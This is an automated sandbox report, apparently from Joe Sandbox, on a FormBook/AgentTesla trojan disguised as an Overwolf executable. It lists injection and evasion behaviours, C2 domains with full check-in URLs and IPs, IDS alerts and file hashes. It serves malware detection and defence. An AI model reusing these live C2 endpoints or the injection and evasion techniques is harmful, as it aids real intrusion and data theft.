          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets112
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items13
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 562399 Sample: GV8EJooYMIgEnEk.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 8 other signatures 2->42 10 GV8EJooYMIgEnEk.exe 3 2->10         started        process3 file4 28 C:\Users\user\...behaviorgraphV8EJooYMIgEnEk.exe.log, ASCII 10->28 dropped 54 Tries to detect virtualization through RDTSC time measurements 10->54 56 Injects a PE file into a foreign processes 10->56 14 GV8EJooYMIgEnEk.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.experiencedlawfirms.com 166.88.62.202, 49816, 80 EGIHOSTINGUS United States 17->30 32 www.totalwinerewards.com 199.59.243.200, 49817, 80 BODIS-NJUS United States 17->32 34 8 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 chkdsk.exe 17->21         started        signatures10 process11 signatures12 46 Self deletion via cmd delete 21->46 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          GV8EJooYMIgEnEk.exe61%VirustotalBrowse
          GV8EJooYMIgEnEk.exe21%MetadefenderBrowse
          GV8EJooYMIgEnEk.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          GV8EJooYMIgEnEk.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.omnipets.store/cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL80%Avira URL Cloudsafe
          http://schemas.mi0%URL Reputationsafe
          http://www.totalwinerewards.com/cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL80%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://schemas.micr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.cottoneworld.com/cbgo/100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          https://parking.bodiscdn.com0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf100%Avira URL Cloudmalware
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL80%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.bitconga.com
          		18.231.72.25
          		truetrue
            		unknown
            webarate.com
            		46.252.151.235
            		truetrue
              		unknown
              omnipets.store
              		34.102.136.180
              		truefalse
                		unknown
                www.totalwinerewards.com
                		199.59.243.200
                		truetrue
                  		unknown
                  www.experiencedlawfirms.com
                  		166.88.62.202
                  		truetrue
                    		unknown
                    casatowerofficial.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      www.casatowerofficial.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.webarate.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.tothelaundry.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.omnipets.store
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.omnipets.store/cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.totalwinerewards.com/cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8true
                              • Avira URL Cloud: safe
                              		unknown
                              www.cottoneworld.com/cbgo/true
                              • Avira URL Cloud: malware
                              		low
                              http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylffalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8true
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.apache.org/licenses/LICENSE-2.0GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designersGGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.miexplorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/?GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/bTheGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers?GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.tiro.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designersGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.goodfont.co.krGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.micrexplorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.comlGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.google.comchkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers/cabarga.htmlNGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cn/cTheGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/staff/dennis.htmGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://fontfabrik.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cnGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-jones.htmlGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.galapagosdesign.com/DPleaseGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.fonts.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.sandoll.co.krGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://parking.bodiscdn.comchkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.urwpp.deDPleaseGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.zhongyicts.com.cnGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.sakkal.comGV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    46.252.151.235
                                                    		webarate.comItaly
                                                    		60087ASSUPERNOVAITtrue
                                                    166.88.62.202
                                                    		www.experiencedlawfirms.comUnited States
                                                    		18779EGIHOSTINGUStrue
                                                    18.231.72.25
                                                    		www.bitconga.comUnited States
                                                    		16509AMAZON-02UStrue
                                                    34.102.136.180
                                                    		omnipets.storeUnited States
                                                    		15169GOOGLEUSfalse
                                                    199.59.243.200
                                                    		www.totalwinerewards.comUnited States
                                                    		395082BODIS-NJUStrue

                                                    General Information

                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                    Analysis ID:562399
                                                    Start date:28.01.2022
                                                    Start time:20:57:13
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 37s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:GV8EJooYMIgEnEk.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:20
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@7/1@7/5
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 20.6% (good quality ratio 18.5%)
                                                    • Quality average: 70.5%
                                                    • Quality standard deviation: 32.3%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 184.87.213.153
                                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    20:58:32API Interceptor1x Sleep call for process: GV8EJooYMIgEnEk.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASNs

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GV8EJooYMIgEnEk.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.355304211458859
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                    MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                    SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                    SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                    SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.768784179337575
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:GV8EJooYMIgEnEk.exe
                                                    File size:391680
                                                    MD5:cf6d4fd3dc8e4751b7f89f857b618ef3
                                                    SHA1:15b95f0f1b5785bb7fd3d97757f3eea49d1f6951
                                                    SHA256:9689e8e0cf51b8b5c98ddb007636d8acf7e03c9cc8a7bf99aafdaaebae2dfb3a
                                                    SHA512:86af327caf1d55c8d3dd1e2319dcae1faaf7db82fb2fdce83999b0a4e5c6af2ce700fb0c69f568169110f04b9af6543e069aee59101370d6af060d8d4763d43f
                                                    SSDEEP:6144:7qy0O+Q45IX8LhyTaFwZCpZpwhTvQJWpLcbK8lpmybOVbGmb0Xj/9JnQiypM7Jz8:7HgwZIjwxvwCLc9pHbOVLgXjLQiypM7
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._.a............................>.... ... ....@.. .......................`............@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x460d3e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x61F25F83 [Thu Jan 27 09:01:55 2022 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x60cf00x4b.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x61c.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x60c960x1c.text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x5ed440x5ee00False0.88598793643data7.78260076892IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x620000x61c0x800False0.32568359375data3.4603762807IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x640000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_VERSION0x620a00x38edata
                                                    RT_MANIFEST0x624300x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright Overwolf 2021
                                                    Assembly Version11.0.0.0
                                                    InternalNameStructuralEqualityCompar.exe
                                                    FileVersion11.0.0.0
                                                    CompanyNameOverwolf LTD
                                                    LegalTrademarks
                                                    Comments
                                                    ProductNameOverwolf
                                                    ProductVersion11.0.0.0
                                                    FileDescriptionOverwolf
                                                    OriginalFilenameStructuralEqualityCompar.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    01/28/22-20:59:48.188612TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.3199.59.243.200
                                                    01/28/22-20:59:48.188612TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.3199.59.243.200
                                                    01/28/22-20:59:48.188612TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.3199.59.243.200
                                                    01/28/22-20:59:53.555000TCP1201ATTACK-RESPONSES 403 Forbidden804981934.102.136.180192.168.2.3
                                                    01/28/22-20:59:59.099003TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.318.231.72.25
                                                    01/28/22-20:59:59.099003TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.318.231.72.25
                                                    01/28/22-20:59:59.099003TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.318.231.72.25
                                                    01/28/22-21:00:09.463600TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982180192.168.2.334.102.136.180
